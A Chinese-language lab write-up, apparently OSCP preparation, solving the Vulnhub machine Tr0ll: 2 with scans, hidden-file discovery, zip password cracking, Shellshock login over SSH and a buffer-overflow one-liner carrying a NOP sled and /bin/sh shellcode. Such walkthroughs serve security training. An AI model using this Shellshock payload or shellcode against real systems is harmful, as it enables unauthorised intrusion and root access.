OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

Ethan医生1周前靶场28
名称说明
靶机下载链接https://www.vulnhub.com/entry/tr0ll-2,107/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.174

信息收集

先看存活的主机

image.png

找到了就开始搜索存在的端口还有服务吧

nmap -p- -sV -O -A 192.168.233.174

image.png

有FTP先测试看看能不能anonymous 匿名登入(很好不是每次都那么好运)

image.png


访问WEB看看http://192.168.233.174/ ,又是它

image.png

<html>

<img src='tr0ll_again.jpg'>

</html>

<!--Nothing here, Try Harder!>

<!--Author: Tr0ll>

<!--Editor: VIM>

只好先爆破路径测试看看底下有没有啥文件

gobuster dir -u http://192.168.233.174 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt 

image.png

只有发现robots查看是啥http://192.168.233.174/robots

image.png

使用脚本再跑一次

image.png

发现有上面四个路径 开始访问看看

image.png

都是同一个图片,但是似乎细节藏在图片里,于是把图片都下载了

使用binwalk都没有发现异常

image.png

开始使用strings提取strings img.jpg

image.png

看到有个返回y0ur_self应该是目录测试看看

http://192.168.233.174/y0ur_self/

image.png

下载看看是啥鬼,类似base64拿去解密看看

image.png

下载下来 wget http://192.168.233.174/y0ur_self/answer.txt 

base64 -d answer.txt > list.txt 进行decode

image.png

感觉有点像密码,目前只知道一开始提示Author: Tr0ll 试试看啰. 

爆破FTP看看,最后还是使用账号Tr0ll密码Tr0ll, 惊奇的发现登入了

image.png

image.png

将挡案下载下来,解压需要密码,使用fcrackzip进行暴力破解一下

image.png

fcrackzip -u -D -p list.txt lmao.zip 
-u 用zip去尝试
-D 使用字典
-p 使用字符串作为初始密码/文件

image.png

image.png

一个RSA的私钥

前面信息搜集到openSSH版本不高可以枚举有没有用户noob在使用noob进行登入

image.png

image.png


发现不能登入... 

只能看其他人怎么处理的

shellshock攻击

网上找了下原因,发现是可以通过shellshock进行利用的,相关参考链接:https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh

经过测试,最终通过下面3种形式登录成功

ssh noob@192.168.5.141 -i noob -t "() { :; }; /bin/bash"
ssh -i noob noob@192.168.5.141 -t "() { :; }; /bin/bash"
ssh -i noob 192.168.5.141 -l noob -t "() { :; }; /bin/bash"


使用find命令查看特权用户信息

find / -perm -4000 2>/dev/null


在这里插入图片描述




./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')

image.png

在这里插入图片描述





标签: OSCP

相关文章

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。